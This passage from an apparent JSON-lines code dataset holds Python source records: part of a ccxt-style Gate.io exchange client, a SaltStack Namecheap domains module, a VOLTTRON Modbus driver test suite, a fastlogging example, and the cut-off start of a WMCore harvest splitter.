'fee')\n if fee:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(order, 'fee_currency')),\n 'cost': fee,\n })\n rebate = self.safe_string(order, 'rebated_fee')\n if rebate:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(order, 'rebated_fee_currency')),\n 'cost': self.parse_number(Precise.string_neg(rebate)),\n })\n mkfr = self.safe_number(order, 'mkfr')\n tkfr = self.safe_number(order, 'tkfr')\n if mkfr:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(order, 'settleId')),\n 'cost': mkfr,\n })\n if tkfr:\n fees.append({\n 'currency': self.safe_currency_code(self.safe_string(market, 'settleId')),\n 'cost': tkfr,\n })\n return self.safe_order2({\n 'id': id,\n 'clientOrderId': id,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'lastTradeTimestamp': lastTradeTimestamp,\n 'status': status,\n 'symbol': symbol,\n 'type': type,\n 'timeInForce': timeInForce,\n 'postOnly': None,\n 'side': side,\n 'price': price,\n 'stopPrice': None,\n 'average': average,\n 'amount': amount,\n 'cost': cost,\n 'filled': None,\n 'remaining': remaining,\n 'fee': None,\n 'fees': fees,\n 'trades': None,\n 'info': order,\n }, market)\n\n def fetch_order(self, id, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'order_id': id,\n }\n if market['spot'] or market['margin']:\n request['currency_pair'] = market['id']\n else:\n request['settle'] = market['settleId']\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotGetOrdersOrderId',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'privateFuturesGetSettleOrdersOrderId',\n 'futures': 'privateDeliveryGetSettlePriceOrdersOrderId',\n })\n response = getattr(self, method)(self.extend(request, params))\n return self.parse_order(response, market)\n\n def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n if symbol is None and (type == 'spot') or type == 'margin' or type == 'cross_margin':\n request = {\n # 'page': 1,\n # 'limit': limit,\n 'account': type, # spot/margin(default), cross_margin\n }\n if limit is not None:\n request['limit'] = limit\n response = self.privateSpotGetOpenOrders(self.extend(request, params))\n #\n # [\n # {\n # \"currency_pair\": \"ETH_BTC\",\n # \"total\": 1,\n # \"orders\": [\n # {\n # \"id\": \"12332324\",\n # \"text\": \"t-123456\",\n # \"create_time\": \"1548000000\",\n # \"update_time\": \"1548000100\",\n # \"currency_pair\": \"ETH_BTC\",\n # \"status\": \"open\",\n # \"type\": \"limit\",\n # \"account\": \"spot\",\n # \"side\": \"buy\",\n # \"amount\": \"1\",\n # \"price\": \"5.00032\",\n # \"time_in_force\": \"gtc\",\n # \"left\": \"0.5\",\n # \"filled_total\": \"2.50016\",\n # \"fee\": \"0.005\",\n # \"fee_currency\": \"ETH\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\",\n # \"gt_discount\": False,\n # \"rebated_fee\": \"0\",\n # \"rebated_fee_currency\": \"BTC\"\n # }\n # ]\n # },\n # ...\n # ]\n #\n allOrders = []\n for i in range(0, len(response)):\n entry = response[i]\n orders = self.safe_value(entry, 'orders', [])\n parsed = self.parse_orders(orders, None, since, limit)\n allOrders = self.array_concat(allOrders, parsed)\n return self.filter_by_since_limit(allOrders, since, limit)\n return self.fetch_orders_by_status('open', symbol, since, limit, params)\n\n def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('finished', symbol, since, limit, params)\n\n def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrdersByStatus requires a symbol argument')\n market = self.market(symbol)\n request = self.prepare_request(market)\n request['status'] = status\n if limit is not None:\n request['limit'] = limit\n if since is not None and (market['spot'] or market['margin']):\n request['start'] = int(since / 1000)\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotGetOrders',\n 'margin': 'privateSpotGetOrders',\n 'swap': 'privateFuturesGetSettleOrders',\n 'futures': 'privateDeliveryGetSettleOrders',\n })\n if market['type'] == 'margin' or market['type'] == 'cross_margin':\n request['account'] = market['type']\n response = getattr(self, method)(self.extend(request, params))\n # SPOT\n # {\n # \"id\":\"8834234273\",\n # \"text\": \"3\",\n # \"create_time\": \"1635406193\",\n # \"update_time\": \"1635406193\",\n # \"create_time_ms\": 1635406193361,\n # \"update_time_ms\": 1635406193361,\n # \"status\": \"closed\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"type\": \"limit\",\n # \"account\": \"spot\",\n # \"side\": \"sell\",\n # \"amount\": \"0.0002\",\n # \"price\": \"58904.01\",\n # \"time_in_force\":\"gtc\",\n # \"iceberg\": \"0\",\n # \"left\": \"0.0000\",\n # \"fill_price\": \"11.790516\",\n # \"filled_total\": \"11.790516\",\n # \"fee\": \"0.023581032\",\n # \"fee_currency\": \"USDT\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\",\n # \"gt_discount\": False,\n # \"rebated_fee_currency\": \"BTC\"\n # }\n # Perpetual Swap\n # {\n # \"status\": \"finished\",\n # \"size\":-1,\n # \"left\":0,\n # \"id\":82750739203,\n # \"is_liq\":false,\n # \"is_close\":false,\n # \"contract\": \"BTC_USDT\",\n # \"text\": \"web\",\n # \"fill_price\": \"60721.3\",\n # \"finish_as\": \"filled\",\n # \"iceberg\":0,\n # \"tif\": \"ioc\",\n # \"is_reduce_only\":true,\n # \"create_time\": 1635403475.412,\n # \"finish_time\": 1635403475.4127,\n # \"price\": \"0\"\n # }\n return self.parse_orders(response, market, since, limit)\n\n def cancel_order(self, id, symbol=None, params={}):\n self.load_markets()\n if symbol is None:\n raise ArgumentsRequired(self.id + ' cancelOrders requires a symbol parameter')\n market = self.market(symbol)\n request = {\n 'order_id': id,\n }\n if market['contract']:\n request['settle'] = market['settleId']\n else:\n request['currency_pair'] = market['id']\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotDeleteOrdersOrderId',\n 'margin': 'privateSpotDeleteOrdersOrderId',\n 'swap': 'privateFuturesDeleteSettleOrdersOrderId',\n 'futures': 'privateDeliveryDeleteSettleOrdersOrderId',\n })\n response = getattr(self, method)(self.extend(request, params))\n # Perpetual swap\n # {\n # id: \"82241928192\",\n # contract: \"BTC_USDT\",\n # mkfr: \"0\",\n # tkfr: \"0.0005\",\n # tif: \"gtc\",\n # is_reduce_only: False,\n # create_time: \"1635196145.06\",\n # finish_time: \"1635196233.396\",\n # price: \"61000\",\n # size: \"4\",\n # refr: \"0\",\n # left: \"4\",\n # text: \"web\",\n # fill_price: \"0\",\n # user: \"6693577\",\n # finish_as: \"cancelled\",\n # status: \"finished\",\n # is_liq: False,\n # refu: \"0\",\n # is_close: False,\n # iceberg: \"0\",\n # }\n return self.parse_order(response, market)\n\n def transfer(self, code, amount, fromAccount, toAccount, params={}):\n self.load_markets()\n currency = self.currency(code)\n accountsByType = self.safe_value(self.options, 'accountsByType', {})\n fromId = self.safe_string(accountsByType, fromAccount, fromAccount)\n toId = self.safe_string(accountsByType, toAccount, toAccount)\n if fromId is None:\n keys = list(accountsByType.keys())\n raise ExchangeError(self.id + ' fromAccount must be one of ' + ', '.join(keys))\n if toId is None:\n keys = list(accountsByType.keys())\n raise ExchangeError(self.id + ' toAccount must be one of ' + ', '.join(keys))\n truncated = self.currency_to_precision(code, amount)\n request = {\n 'currency': currency['id'],\n 'from': fromId,\n 'to': toId,\n 'amount': truncated,\n }\n if (toId == 'futures') or (toId == 'delivery'):\n request['settle'] = currency['id']\n response = self.privateWalletPostTransfers(self.extend(request, params))\n #\n # according to the docs\n #\n # {\n # \"currency\": \"BTC\",\n # \"from\": \"spot\",\n # \"to\": \"margin\",\n # \"amount\": \"1\",\n # \"currency_pair\": \"BTC_USDT\"\n # }\n #\n # actual response\n #\n # POST https://api.gateio.ws/api/v4/wallet/transfers 204 No Content\n #\n return {\n 'info': response,\n 'from': fromId,\n 'to': toId,\n 'amount': truncated,\n 'code': code,\n }\n\n def set_leverage(self, leverage, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')\n # WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS\n # AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS\n if (leverage < 0) or (leverage > 100):\n raise BadRequest(self.id + ' leverage should be between 1 and 100')\n self.load_markets()\n market = self.market(symbol)\n method = self.get_supported_mapping(market['type'], {\n 'swap': 'privateFuturesPostSettlePositionsContractLeverage',\n 'futures': 'privateDeliveryPostSettlePositionsContractLeverage',\n })\n request = self.prepare_request(market)\n request['query'] = {\n 'leverage': str(leverage),\n }\n if 'cross_leverage_limit' in params:\n if leverage != 0:\n raise BadRequest(self.id + ' cross margin leverage(valid only when leverage is 0)')\n request['cross_leverage_limit'] = str(params['cross_leverage_limit'])\n params = self.omit(params, 'cross_leverage_limit')\n response = getattr(self, method)(self.extend(request, params))\n #\n # {\n # \"value\":\"0\",\n # \"leverage\":\"5\",\n # \"mode\":\"single\",\n # \"realised_point\":\"0\",\n # \"contract\":\"BTC_USDT\",\n # \"entry_price\":\"0\",\n # \"mark_price\":\"62035.86\",\n # \"history_point\":\"0\",\n # \"realised_pnl\":\"0\",\n # \"close_order\":null,\n # \"size\":0,\n # \"cross_leverage_limit\":\"0\",\n # \"pending_orders\":0,\n # \"adl_ranking\":6,\n # \"maintenance_rate\":\"0.005\",\n # \"unrealised_pnl\":\"0\",\n # \"user\":2436035,\n # \"leverage_max\":\"100\",\n # \"history_pnl\":\"0\",\n # \"risk_limit\":\"1000000\",\n # \"margin\":\"0\",\n # \"last_close_pnl\":\"0\",\n # \"liq_price\":\"0\"\n # }\n #\n return response\n\n def sign(self, path, api=[], method='GET', params={}, headers=None, body=None):\n authentication = api[0] # public, private\n type = api[1] # spot, margin, futures, delivery\n query = self.omit(params, self.extract_params(path))\n path = self.implode_params(path, params)\n endPart = (path == '' if '' else '/' + path)\n entirePath = '/' + type + endPart\n url = self.urls['api'][authentication] + entirePath\n if authentication == 'public':\n if query:\n url += '?' + self.urlencode(query)\n else:\n queryString = ''\n if (method == 'GET') or (method == 'DELETE'):\n if query:\n queryString = self.urlencode(query)\n url += '?' + queryString\n else:\n urlQueryParams = self.safe_value(query, 'query', {})\n if urlQueryParams:\n queryString = self.urlencode(urlQueryParams)\n url += '?' + queryString\n query = self.omit(query, 'query')\n body = self.json(query)\n bodyPayload = '' if (body is None) else body\n bodySignature = self.hash(self.encode(bodyPayload), 'sha512')\n timestamp = self.seconds()\n timestampString = str(timestamp)\n signaturePath = '/api/' + self.version + entirePath\n payloadArray = [method.upper(), signaturePath, queryString, bodySignature, timestampString]\n # eslint-disable-next-line quotes\n payload = \"\\n\".join(payloadArray)\n signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha512)\n headers = {\n 'KEY': self.apiKey,\n 'Timestamp': timestampString,\n 'SIGN': signature,\n 'Content-Type': 'application/json',\n }\n return {'url': url, 'method': method, 'body': body, 'headers': headers}\n\n def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):\n label = self.safe_string(response, 'label')\n if label is not None:\n message = self.safe_string_2(response, 'message', 'detail', '')\n Error = self.safe_value(self.exceptions, label, ExchangeError)\n raise Error(self.id + ' ' + message)\n"} {"ext": "py", "sha": "1a303f5dd3f04b543141a87c6dbda94b607b0415", "content": "# -*- coding: utf-8 -*-\n'''\nNamecheap domains management\n\n .. versionadded:: 2017.7.0\n\n General Notes\n -------------\n\n Use this module to manage domains through the namecheap\n api. The Namecheap settings will be set in grains.\n\n Installation Prerequisites\n --------------------------\n\n - This module uses the following python libraries to communicate to\n the namecheap API:\n\n * ``requests``\n .. code-block:: bash\n\n pip install requests\n\n - As saltstack depends on ``requests`` this shouldn't be a problem\n\n Prerequisite Configuration\n --------------------------\n\n - The namecheap username, api key and url should be set in a minion\n configuration file or pillar\n\n .. code-block:: yaml\n\n namecheap.name: companyname\n namecheap.key: a1b2c3d4e5f67a8b9c0d1e2f3\n namecheap.client_ip: 162.155.30.172\n #Real url\n namecheap.url: https://api.namecheap.com/xml.response\n #Sandbox url\n #namecheap.url: https://api.sandbox.namecheap.xml.response\n\n'''\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nCAN_USE_NAMECHEAP = True\n\ntry:\n import salt.utils.namecheap\nexcept ImportError:\n CAN_USE_NAMECHEAP = False\n\n# Import 3rd-party libs\nfrom salt.ext import six\n\n\ndef __virtual__():\n '''\n Check to make sure requests and xml are installed and requests\n '''\n if CAN_USE_NAMECHEAP:\n return 'namecheap_domains'\n return False\n\n\ndef reactivate(domain_name):\n '''\n Try to reactivate the expired domain name\n\n returns the following information in a dictionary\n issuccess bool indicates whether the domain was renewed successfully\n amount charged for reactivation\n orderid unique integer value for the order\n transactionid unique integer value for the transaction\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.reactivate my-domain-name\n\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.reactivate')\n opts['DomainName'] = domain_name\n\n response_xml = salt.utils.namecheap.post_request(opts)\n\n if response_xml is None:\n return {}\n\n domainreactivateresult = response_xml.getElementsByTagName('DomainReactivateResult')[0]\n return salt.utils.namecheap.xml_to_dict(domainreactivateresult)\n\n\ndef renew(domain_name, years, promotion_code=None):\n '''\n Try to renew the specified expiring domain name for a specified number of years\n\n returns the following information in a dictionary\n renew bool indicates whether the domain was renewed successfully\n domainid unique integer value for the domain\n orderid unique integer value for the order\n transactionid unique integer value for the transaction\n amount charged for renewal\n\n Required parameters:\n domain_name\n string The domain name you wish to renew\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.renew my-domain-name 5\n '''\n\n opts = salt.utils.namecheap.get_opts('namecheap.domains.renew')\n opts['DomainName'] = domain_name\n opts['Years'] = years\n if promotion_code is not None:\n opts['PromotionCode'] = promotion_code\n\n response_xml = salt.utils.namecheap.post_request(opts)\n\n if response_xml is None:\n return {}\n\n domainrenewresult = response_xml.getElementsByTagName(\"DomainRenewResult\")[0]\n return salt.utils.namecheap.xml_to_dict(domainrenewresult)\n\n\ndef create(domain_name, years, **kwargs):\n '''\n Try to create the specified domain name for the specified number of years\n\n returns the following information in a dictionary\n registered True/False\n amount charged for registration\n domainid unique integer value for the domain\n orderid unique integer value for the order\n transactionid unique integer value for the transaction\n whoisguardenable True,False if enabled for this domain\n nonrealtimedomain True,False if domain registration is instant or not\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.create my-domain-name 2\n '''\n idn_codes = set(['afr',\n 'alb',\n 'ara',\n 'arg',\n 'arm',\n 'asm',\n 'ast',\n 'ave',\n 'awa',\n 'aze',\n 'bak',\n 'bal',\n 'ban',\n 'baq',\n 'bas',\n 'bel',\n 'ben',\n 'bho',\n 'bos',\n 'bul',\n 'bur',\n 'car',\n 'cat',\n 'che',\n 'chi',\n 'chv',\n 'cop',\n 'cos',\n 'cze',\n 'dan',\n 'div',\n 'doi',\n 'dut',\n 'eng',\n 'est',\n 'fao',\n 'fij',\n 'fin',\n 'fre',\n 'fry',\n 'geo',\n 'ger',\n 'gla',\n 'gle',\n 'gon',\n 'gre',\n 'guj',\n 'heb',\n 'hin',\n 'hun',\n 'inc',\n 'ind',\n 'inh',\n 'isl',\n 'ita',\n 'jav',\n 'jpn',\n 'kas',\n 'kaz',\n 'khm',\n 'kir',\n 'kor',\n 'kur',\n 'lao',\n 'lav',\n 'lit',\n 'ltz',\n 'mal',\n 'mkd',\n 'mlt',\n 'mol',\n 'mon',\n 'mri',\n 'msa',\n 'nep',\n 'nor',\n 'ori',\n 'oss',\n 'pan',\n 'per',\n 'pol',\n 'por',\n 'pus',\n 'raj',\n 'rum',\n 'rus',\n 'san',\n 'scr',\n 'sin',\n 'slo',\n 'slv',\n 'smo',\n 'snd',\n 'som',\n 'spa',\n 'srd',\n 'srp',\n 'swa',\n 'swe',\n 'syr',\n 'tam',\n 'tel',\n 'tgk',\n 'tha',\n 'tib',\n 'tur',\n 'ukr',\n 'urd',\n 'uzb',\n 'vie',\n 'wel',\n 'yid'])\n\n require_opts = ['AdminAddress1', 'AdminCity', 'AdminCountry', 'AdminEmailAddress', 'AdminFirstName',\n 'AdminLastName', 'AdminPhone', 'AdminPostalCode', 'AdminStateProvince', 'AuxBillingAddress1',\n 'AuxBillingCity', 'AuxBillingCountry', 'AuxBillingEmailAddress', 'AuxBillingFirstName',\n 'AuxBillingLastName', 'AuxBillingPhone', 'AuxBillingPostalCode', 'AuxBillingStateProvince',\n 'RegistrantAddress1', 'RegistrantCity', 'RegistrantCountry', 'RegistrantEmailAddress',\n 'RegistrantFirstName', 'RegistrantLastName', 'RegistrantPhone', 'RegistrantPostalCode',\n 'RegistrantStateProvince', 'TechAddress1', 'TechCity', 'TechCountry', 'TechEmailAddress',\n 'TechFirstName', 'TechLastName', 'TechPhone', 'TechPostalCode', 'TechStateProvince', 'Years']\n opts = salt.utils.namecheap.get_opts('namecheap.domains.create')\n opts['DomainName'] = domain_name\n opts['Years'] = six.text_type(years)\n\n def add_to_opts(opts_dict, kwargs, value, suffix, prefices):\n for prefix in prefices:\n nextkey = prefix + suffix\n if nextkey not in kwargs:\n opts_dict[nextkey] = value\n\n for key, value in six.iteritems(kwargs):\n if key.startswith('Registrant'):\n add_to_opts(opts, kwargs, value, key[10:], ['Tech', 'Admin', 'AuxBilling', 'Billing'])\n\n if key.startswith('Tech'):\n add_to_opts(opts, kwargs, value, key[4:], ['Registrant', 'Admin', 'AuxBilling', 'Billing'])\n\n if key.startswith('Admin'):\n add_to_opts(opts, kwargs, value, key[5:], ['Registrant', 'Tech', 'AuxBilling', 'Billing'])\n\n if key.startswith('AuxBilling'):\n add_to_opts(opts, kwargs, value, key[10:], ['Registrant', 'Tech', 'Admin', 'Billing'])\n\n if key.startswith('Billing'):\n add_to_opts(opts, kwargs, value, key[7:], ['Registrant', 'Tech', 'Admin', 'AuxBilling'])\n\n if key == 'IdnCode' and key not in idn_codes:\n salt.utils.namecheap.log.error('Invalid IdnCode')\n raise Exception('Invalid IdnCode')\n\n opts[key] = value\n\n for requiredkey in require_opts:\n if requiredkey not in opts:\n salt.utils.namecheap.log.error(\"Missing required parameter '\" + requiredkey + \"'\")\n raise Exception(\"Missing required parameter '\" + requiredkey + \"'\")\n\n response_xml = salt.utils.namecheap.post_request(opts)\n\n if response_xml is None:\n return {}\n\n domainresult = response_xml.getElementsByTagName(\"DomainCreateResult\")[0]\n return salt.utils.namecheap.atts_to_dict(domainresult)\n\n\ndef check(*domains_to_check):\n '''\n Checks the availability of domains\n\n returns a dictionary where the domain name is the key and\n the availability is the value of True/False\n\n domains_to_check\n array of strings List of domains to check\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.check domain-to-check\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.check')\n opts['DomainList'] = ','.join(domains_to_check)\n\n response_xml = salt.utils.namecheap.get_request(opts)\n\n if response_xml is None:\n return {}\n\n domains_checked = {}\n for result in response_xml.getElementsByTagName(\"DomainCheckResult\"):\n available = result.getAttribute(\"Available\")\n domains_checked[result.getAttribute(\"Domain\").lower()] = salt.utils.namecheap.string_to_value(available)\n\n return domains_checked\n\n\ndef get_info(domain_name):\n '''\n Returns information about the requested domain\n\n returns a dictionary of information about the domain_name\n\n domain_name\n string Domain name to get information about\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.get_info my-domain-name\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.getinfo')\n opts['DomainName'] = domain_name\n\n response_xml = salt.utils.namecheap.get_request(opts)\n\n if response_xml is None:\n return []\n\n domaingetinforesult = response_xml.getElementsByTagName(\"DomainGetInfoResult\")[0]\n\n return salt.utils.namecheap.xml_to_dict(domaingetinforesult)\n\n\ndef get_tld_list():\n '''\n Returns a list of TLDs as objects\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.get_tld_list\n '''\n\n response_xml = salt.utils.namecheap.get_request(salt.utils.namecheap.get_opts('namecheap.domains.gettldlist'))\n\n if response_xml is None:\n return []\n\n tldresult = response_xml.getElementsByTagName(\"Tlds\")[0]\n tlds = []\n\n for e in tldresult.getElementsByTagName(\"Tld\"):\n tld = salt.utils.namecheap.atts_to_dict(e)\n tld['data'] = e.firstChild.data\n categories = []\n subcategories = e.getElementsByTagName(\"Categories\")[0]\n for c in subcategories.getElementsByTagName(\"TldCategory\"):\n categories.append(salt.utils.namecheap.atts_to_dict(c))\n tld['categories'] = categories\n tlds.append(tld)\n\n return tlds\n\n\ndef get_list(list_type=None,\n search_term=None,\n page=None,\n page_size=None,\n sort_by=None):\n '''\n Returns a list of domains for the particular user as a list of objects\n offset by ``page`` length of ``page_size``\n\n list_type\n string Possible values are ALL/EXPIRING/EXPIRED\n Default: ALL\n\n search_term\n string Keyword to look for on the domain list\n\n page\n integer Page to return\n Default: 1\n\n page_size\n integer Number of domains to be listed in a page\n Minimum value is 10 and maximum value is 100\n Default: 20\n\n sort_by\n string Possible values are NAME/NAME_DESC/EXPIREDATE/\n EXPIREDATE_DESC/CREATEDATE/CREATEDATE_DESC\n\n CLI Example:\n\n .. code-block:: bash\n\n salt 'my-minion' namecheap_domains.get_list\n '''\n opts = salt.utils.namecheap.get_opts('namecheap.domains.getList')\n\n if list_type is not None:\n if list_type not in ['ALL', 'EXPIRING', 'EXPIRED']:\n salt.utils.namecheap.log.error('Invalid option for list_type')\n raise Exception('Invalid option for list_type')\n opts['ListType'] = list_type\n\n if search_term is not None:\n if len(search_term) > 70:\n salt.utils.namecheap.log.warning('search_term trimmed to first 70 characters')\n search_term = search_term[0:70]\n opts['SearchTerm'] = search_term\n\n if page is not None:\n opts['Page'] = page\n\n if page_size is not None:\n if page_size > 100 or page_size < 10:\n salt.utils.namecheap.log.error('Invalid option for page')\n raise Exception('Invalid option for page')\n opts['PageSize'] = page_size\n\n if sort_by is not None:\n if sort_by not in ['NAME', 'NAME_DESC', 'EXPIREDATE', 'EXPIREDATE_DESC', 'CREATEDATE', 'CREATEDATE_DESC']:\n salt.utils.namecheap.log.error('Invalid option for sort_by')\n raise Exception('Invalid option for sort_by')\n opts['SortBy'] = sort_by\n\n response_xml = salt.utils.namecheap.get_request(opts)\n\n if response_xml is None:\n return []\n\n domainresult = response_xml.getElementsByTagName(\"DomainGetListResult\")[0]\n\n domains = []\n for d in domainresult.getElementsByTagName(\"Domain\"):\n domains.append(salt.utils.namecheap.atts_to_dict(d))\n\n return domains\n"} {"ext": "py", "sha": "1a304133d9c9c3a4d15a88abf0d59cfa798ca46c", "content": "import pytest\nimport gevent\nimport logging\nimport time\n\nfrom volttron.platform import get_services_core\nfrom master_driver.interfaces.modbus_tk.server import Server\nfrom master_driver.interfaces.modbus_tk.maps import Map, Catalog\n\nlogger = logging.getLogger(__name__)\n\n# modbus_tk driver config\nDRIVER_CONFIG_STRING = \"\"\"{\n \"driver_config\": {\n \"name\": \"write_single_registers\",\n \"device_address\": \"127.0.0.1\",\n \"port\": 5020,\n \"slave_id\": 1,\n \"baudrate\": 9600,\n \"bytesize\": 8,\n \"parity\": \"none\",\n \"stopbits\": 1,\n \"xonxoff\": 0,\n \"addressing\": \"offset\",\n \"endian\": \"big\",\n \"write_multiple_registers\": false,\n \"register_map\": \"config://write_single_registers_map.csv\"\n},\n \"driver_type\": \"modbus_tk\",\n \"registry_config\": \"config://write_single_registers.csv\",\n \"interval\": 120,\n \"timezone\": \"UTC\"\n}\"\"\"\n\n# modbus_tk csv config\nREGISTRY_CONFIG_STRING = \"\"\"Volttron Point Name,Register Name\nunsigned short,unsigned_short\nsample bool,sample_bool\"\"\"\n\nREGISTRY_CONFIG_MAP = \"\"\"Register Name,Address,Type,Units,Writable,Default Value,Transform\nunsigned_short,0,uint16,None,TRUE,0,scale(10)\nsample_bool,16,bool,None,TRUE,False,\"\"\"\n\n\n@pytest.fixture(scope=\"module\")\ndef agent(request, volttron_instance):\n \"\"\"Build MasterDriverAgent, add modbus driver & csv configurations\n \"\"\"\n\n # Build master driver agent\n md_agent = volttron_instance.build_agent()\n\n # Clean out master driver configurations\n md_agent.vip.rpc.call('config.store',\n 'manage_delete_store',\n 'platform.driver')\n\n # Add driver configurations\n md_agent.vip.rpc.call('config.store',\n 'manage_store',\n 'platform.driver',\n 'devices/write_single_registers',\n DRIVER_CONFIG_STRING,\n config_type='json')\n\n # Add csv configurations\n md_agent.vip.rpc.call('config.store',\n 'manage_store',\n 'platform.driver',\n 'write_single_registers.csv',\n REGISTRY_CONFIG_STRING,\n config_type='csv')\n\n md_agent.vip.rpc.call('config.store',\n 'manage_store',\n 'platform.driver',\n 'write_single_registers_map.csv',\n REGISTRY_CONFIG_MAP,\n config_type='csv')\n\n master_uuid = volttron_instance.install_agent(agent_dir=get_services_core(\"MasterDriverAgent\"),\n config_file={},\n start=True)\n\n gevent.sleep(10) # wait for the agent to start and start the devices\n\n def stop():\n \"\"\"Stop master driver agent\n \"\"\"\n volttron_instance.stop_agent(master_uuid)\n md_agent.core.stop()\n\n request.addfinalizer(stop)\n return md_agent\n\n@pytest.fixture(scope='class')\ndef modbus_server(request):\n ModbusClient = Catalog()['write_single_registers'].get_class()\n\n server_process = Server(address='127.0.0.1', port=5020)\n server_process.define_slave(1, ModbusClient, unsigned=False)\n\n server_process.start()\n time.sleep(1)\n yield server_process\n time.sleep(1)\n server_process.stop()\n\n@pytest.mark.usefixtures(\"modbus_server\")\nclass TestModbusTKDriver:\n \"\"\"\n Regression tests for the write_single_registers driver interface.\n \"\"\"\n\n def get_point(self, agent, point_name):\n \"\"\"\n Issue a get_point RPC call for the named point and return the result.\n\n @param agent: The test Agent.\n @param point_name: The name of the point to query.\n @return: The actual reading value of the point name from the RPC call.\n \"\"\"\n return agent.vip.rpc.call('platform.driver', 'get_point', 'write_single_registers', point_name).get(timeout=10)\n\n def set_point(self, agent, point_name, point_value):\n \"\"\"\n Issue a set_point RPC call for the named point and value, and return the result.\n\n @param agent: The test Agent.\n @param point_name: The name of the point to query.\n @param point_value: The value to set on the point.\n @return:The actual reading value of the point name from the RPC call.\n \"\"\"\n return agent.vip.rpc.call('platform.driver', 'set_point', 'write_single_registers', point_name, point_value).get(timeout=10)\n\n def scrape_all(self, agent):\n \"\"\"\n Issue a get_point RPC call for the device and return the result.\n\n @param agent: The test Agent.\n @return: The dictionary mapping point names to their actual values from the RPC call.\n \"\"\"\n return agent.vip.rpc.call('platform.driver', 'scrape_all', 'write_single_registers').get(timeout=10)\n\n def revert_all(self, agent):\n \"\"\"\n Issue a get_point RPC call for the device and return the result.\n\n @param agent: The test Agent.\n @return: Return value from the RPC call.\n \"\"\"\n return agent.vip.rpc.call('platform.driver', 'revert_device', 'write_single_registers').get(timeout=10)\n\n def revert_point(self, agent, point_name):\n \"\"\"\n Issue a get_point RPC call for the named point and return the result.\n\n @param agent: The test Agent.\n @param point_name: The name of the point to query.\n @return: Return value from the RPC call.\n \"\"\"\n return agent.vip.rpc.call('platform.driver', 'revert_point', 'write_single_registers', point_name).get(timeout=10)\n\n def test_default_values(self, agent):\n \"\"\"Test set default values\n \"\"\"\n self.revert_all(agent)\n\n default_values = self.scrape_all(agent)\n assert type(default_values) is dict\n\n for key in default_values.keys():\n assert default_values[key] == 0\n\n def test_set_point(self, agent):\n \"\"\"Test set points to a new values\n \"\"\"\n set_value = self.set_point(agent, 'unsigned short', 6530)\n assert set_value == 6530\n\n set_value = self.set_point(agent, 'sample bool', True)\n assert set_value == True\n\n def test_get_point(self, agent):\n \"\"\"Test get point after set point\n \"\"\"\n self.set_point(agent, 'unsigned short', 1230)\n get_value = self.get_point(agent, 'unsigned short')\n assert get_value == 1230\n\n def test_revert_point(self, agent):\n \"\"\"Test revert point to default value\n \"\"\"\n self.revert_point(agent, 'unsigned short')\n get_value = self.get_point(agent, 'unsigned short')\n assert get_value == 0\n\n self.revert_point(agent, 'sample bool')\n get_value = self.get_point(agent, 'sample bool')\n assert get_value == False\n\n def test_revert_all(self, agent):\n \"\"\"Test revert device to default values\n \"\"\"\n self.revert_all(agent)\n\n default_values = self.scrape_all(agent)\n assert type(default_values) is dict\n\n for key in default_values.keys():\n assert default_values[key] == 0"} {"ext": "py", "sha": "1a3041f1905cd4b062404e47d44d5493d384fed3", "content": "\r\nfrom fastlogging import LogInit\r\n\r\nif __name__ == \"__main__\":\r\n logger = LogInit(console = True, colors = True)\r\n logger.debug(\"This is a debug message.\")\r\n logger.info(\"This is an info message.\")\r\n logger.warning(\"This is a warning message.\")\r\n logger.error(\"This is an error message.\")\r\n logger.fatal(\"This is a fatal message.\")\r\n logger.rotate()\r\n logger.fatal(\"This is a fatal message.\")\r\n logger.fatal(\"This is a fatal message.\")\r\n logger.fatal(\"This is a fatal message.\")\r\n logger.shutdown()\r\n"} {"ext": "py", "sha": "1a30420fa31052ced8b302cf5e349419c884389f", "content": "#!/usr/bin/env python\n\"\"\"\n_Harvest_\n\n\"\"\"\nfrom future.utils import viewitems\n\nimport threading\nimport logging\n\nfrom WMCore.JobSplitting.JobFactory import JobFactory\nfrom WMCore.Services.UUIDLib import makeUUID\nfrom WMCore.DAOFactory import DAOFactory\nfrom WMCore.JobSplitting.LumiBased import isGoodRun, isGoodLumi\nfrom WMCore.DataStructs.Run import Run\nfrom WMCore.WMSpec.WMTask import 